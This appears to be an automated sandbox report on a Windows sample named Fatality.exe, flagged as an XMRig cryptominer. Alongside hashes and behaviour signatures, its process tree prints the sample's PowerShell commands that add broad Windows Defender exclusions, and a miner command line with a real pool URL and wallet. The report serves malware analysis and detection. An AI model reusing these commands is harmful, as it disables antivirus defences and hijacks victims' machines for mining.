Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
25-01-2025 02:07
Static task
static1
Behavioral task
behavioral1
Sample
Fatality.exe
Resource
win11-20241023-en
General
-
Target
Fatality.exe
-
Size
2.1MB
-
MD5
ab637a979ba3f9e64730d0d64bf55dc7
-
SHA1
2701c106d3b66aa75852f82dfadef0c791e7bc87
-
SHA256
f43db369e0af2af2f1b0abb8da9963e79f21c724b65d2a59db67ca5e4379fb19
-
SHA512
120c9af2442d107d38bde79f80445bff0862e7dde6aa8c3388f0a69061588b0baee10e4ac9cfffcdb25728823e388bc6487e2fe447c758e4dd22d4168c8b7165
-
SSDEEP
49152:r6yNBEGdFePFvVY09GPY9YuQHz/ITi4Na:r6yv/dcbY6YzQi4Na
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral2/memory/3832-17-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-20-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-19-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-24-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-26-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-29-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-28-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-25-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-27-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-33-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-45-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-46-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/3832-47-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 2 3832 cmd.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4048 powershell.exe 832 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3744 set thread context of 3832 3744 Fatality.exe 81 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4048 powershell.exe 4048 powershell.exe 3832 cmd.exe 3832 cmd.exe 832 powershell.exe 832 powershell.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe 3832 cmd.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3744 Fatality.exe Token: SeDebugPrivilege 4048 powershell.exe Token: SeLockMemoryPrivilege 3832 cmd.exe Token: SeLockMemoryPrivilege 3832 cmd.exe Token: SeDebugPrivilege 832 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 3744 wrote to memory of 5032 3744 Fatality.exe 77 PID 3744 wrote to memory of 5032 3744 Fatality.exe 77 PID 5032 wrote to memory of 4048 5032 cmd.exe 79 PID 5032 wrote to memory of 4048 5032 cmd.exe 79 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 3744 wrote to memory of 3832 3744 Fatality.exe 81 PID 5032 wrote to memory of 832 5032 cmd.exe 82 PID 5032 wrote to memory of 832 5032 cmd.exe 82
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fatality.exe"C:\Users\Admin\AppData\Local\Temp\Fatality.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
-
C:\Windows\System32\cmd.exeC:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10343 --user=455nttL43xofRvzTCtQ7ZX1KrU2NA26Fvci3pLMPaWzR1oD2N1nX --pass= --cpu-max-threads-hint=10 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=30 --tls --cinit-stealth2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55ba388a6597d5e09191c2c88d2fdf598
SHA113516f8ec5a99298f6952438055c39330feae5d8
SHA256e6b6223094e8fc598ad12b3849e49f03a141ccd21e0eaa336f81791ad8443eca
SHA512ead2a2b5a1c2fad70c1cf570b2c9bfcb7364dd9f257a834eb819e55b8fee78e3f191f93044f07d51c259ca77a90ee8530f9204cbae080fba1d5705e1209f5b19
-
Filesize
944B
MD599c85c4e6cb151448a0a3c169876da10
SHA179e9627e9e5682d83c04d4cdf7786e5d89dcb03a
SHA2563ea265fa8b84a8a0d19e2e03348c1034b144420a06dc179ce7490db25ea0329c
SHA51273d4043546d701e3cb68fe737f6c8b1976f0394f6794629b8bbc9d0a783f510f857ad3cec68e4d34bc0e010c79a7cea99b00bf3c9692ce675cfd71015c699599
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82